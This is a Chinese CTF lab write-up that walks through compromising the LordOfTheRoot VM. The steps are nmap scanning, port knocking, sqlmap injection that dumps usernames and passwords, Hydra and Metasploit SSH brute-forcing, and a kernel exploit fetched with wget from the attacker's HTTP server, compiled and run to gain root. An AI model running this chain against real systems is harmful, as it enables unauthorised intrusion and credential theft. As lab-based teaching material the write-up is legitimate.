No.6-红队渗透项目:LordOfTheRoot_1.0.1

2024-04-26 894 0

简介

作者:摇光

时间:2024-04-19

座右铭:路虽远,行则将至,事虽难,做则必成。

请注意:

对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址

nmap -sP 192.168.111.0/24

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图

目标主机的ip:192.168.111.138

nmap -sS -sV -A -p- -T5 192.168.111.138

扫描全端口,查看开放端口及服务详情

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图1

只开放了22端口及ssh服务

二、ssh尝试登录

ssh 192.168.111.138

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图2

Easy as 1,2,3

意思是让敲震端口3次

---------

端口碰撞

端口试探(port knocking)是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机。

端口试探的主要目的是防治攻击者通过端口扫描的方式对主机进行攻击。端口试探类似于一次秘密握手协议,比如一种最基本的方式:发送一定序列的UDP、TCP数据包。当运行在主机上的daemon程序捕捉到数据包以后,如果这个序列正确,则开启相应的端口,或者防火墙允许客户端通过。

由于对外的Linux服务器通过限制IP地址的方式来控制访问,因此可以利用这种端口试探方式来进行防火墙对于访问IP地址的控制。

如何进行端口碰撞?

首先需要我们知道端口碰撞的序列,否则暴力碰撞开启的机会太小。

1)第一种方法:knock 命令
linux安装:sudo apt install knockd

使用:
knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v
例如需要碰撞 172.16.1.1 的 3,4,7,8 端口:
knock 10.211.55.11 1 2 3 -v2)hping3:TCP/IP数据包组装/分析工具
hping3 -S [IP地址] -p 1 -c 1

hping3 -S 10.211.55.11 -p 1 -c 1
hping3 -S 10.211.55.11 -p 2 -c 1
hping3 -S 10.211.55.11 -p 3 -c 1
----------------
-S(--syn):SYN是TCP/IP建立连接时使用的握手信号。在客户机和服务器之间建立正常的TCP网络连接时,客户机首先发出一个SYN消息,服务器使用SYN-ACK应答表示接收到了这个消息,最后客户机再以ACK消息响应。这样在客户机和服务器之间才能建立起可靠的TCP连接,数据才可以在客户机和服务器之间传递。
-p --destport: 目的端口(默认为0),可同时指定多个端口
-c --count:指定数据包的次数

参考资料:https://blog.csdn.net/qq_30247635/article/details/86243448

---------

hping3端口碰撞

hping3 -S 192.168.111.138 -p 1 -c 1

hping3 -S 192.168.111.138 -p 2 -c 1

hping3 -S 192.168.111.138 -p 3 -c 1

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图3

通过ping冲撞之后,防火墙规则,重新进行nmap扫描,查看碰撞打开的端口

nmap -sS -sV -A -p- -T5 192.168.111.138

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图4

发现打开了1337端口

1337端口存在http服务,进行信息枚举

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图5

经过枚举,发现该路径:/usr/share/dirb/wordlists/common.txt

三、web渗透

浏览器访问

http://192.168.111.138:1337/usr/share/dirb/wordlists/common.txt

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图6

F12查看调试界面

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图7

发现:THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

kali--base64解码

echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图8

解码后的内容为:Lzk3ODM0NTIxMC9pbmRleC5waHA= ,发现还是base64,继续解码

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图9

发现文件路径:/978345210/index.php

浏览器访问

http://192.168.111.138:1337//978345210/index.php

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图10

发现Welcome to the Gates of Mordor,进行sql注入,这里使用sqlmap注入

sqlmap爆破数据库

爆破数据库库名

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs

-------------
Optimization
-o:开启所有优化开关
--predict-output:预测常见的查询输出
--keep-alive:使用持久的HTTP(S)连接
--null-connection:从没有实际的HTTP响应体中检索页面长度

--threads=THREADS:设置请求的并发数
--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试
-------------

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图11

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图12

爆出四个数据库库名信息!继续获取webapp数据表信息!

[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

爆破数据库表信息

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs -D Webapp --tables

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图13

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图14

可以看到Users数据表,继续查看数据表信息!

爆破数据库表字段信息

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs -D Webapp --tables -T Users --columns

(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、--columns:列出指定表上的所有列)

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图15

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图16

可看到数据库Webapp的表Users中存在字段id,password,username信息!

爆破字段内容信息

sqlmap -o -u "http://192.168.111.138:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图17

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图18

获得普通用户的用户名密码,那么来爆破下!
user:
frodo
smeagol
aragorn
legolas
gimli

passwd:
iwilltakethering
MyPreciousR00t
AndMySword
AndMyBow
AndMyAxe

用户名和密码分别写入两个txt文件

SSH爆破-Hydra、MSF

1.hydra(九头蛇)爆破登录用户和密码

hydra -L user.txt -P pass.txt 192.168.111.138 ssh

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图19

获得登录用户和密码

login: smeagol   password: MyPreciousR00t

2.MSF爆破登录用户和密码

启动MSF

msfconsole

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图20

查找ssh的登录漏洞

search ssh_login

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图21

利用第0个漏洞进行爆破

use auxiliary/scanner/ssh/ssh_login

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图22

查看需要哪些配置

show options

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图23

输入配置信息

set rhost 192.168.111.138

set user_file /root/Desktop/lordof/user.txt

set pass_file /root/Desktop/lordof/pass.txt

set stop_on_success true

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图24

运行

run

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图25

获得登录用户名和密码

smeagol:MyPreciousR00t

四、内核提权

SSH登录提权

ssh [email protected]

MyPreciousR00t

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图26

查看系统当前权限,内核版本

id

lsb_release -a

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图27

发现只是普通用户权限,系统版本为Ubuntu 14.04.3 LTS

方法一:EXP内核提权

谷歌搜索:Ubuntu 14.04 exploit
https://www.exploit-db.com/exploits/39166

EDB-ID:39166

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图28

kali查询39166

searchsploit 39166

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图29

查看路径

locate linux/local/39166.c

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图30

拷贝到本地

cp /usr/share/exploitdb/exploits/linux/local/39166.c .

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图31

打开8081端口,准备上传EXP文件

python -m SimpleHTTPServer 8081

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图32

上传EXP文件

wget http://192.168.111.128:8081/39166.c

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图33

编译重命名为yg

gcc 39166.c -o yg

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图34

给编译后的文件赋予最高权限,运行

chmod +x yg

./yg

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图35

提权成功!当前权限为root

切换到root目录,查看flag文件

No.6-红队渗透项目:LordOfTheRoot_1.0.1插图36

“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

方法二:Mysql UDF提权

后续~


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论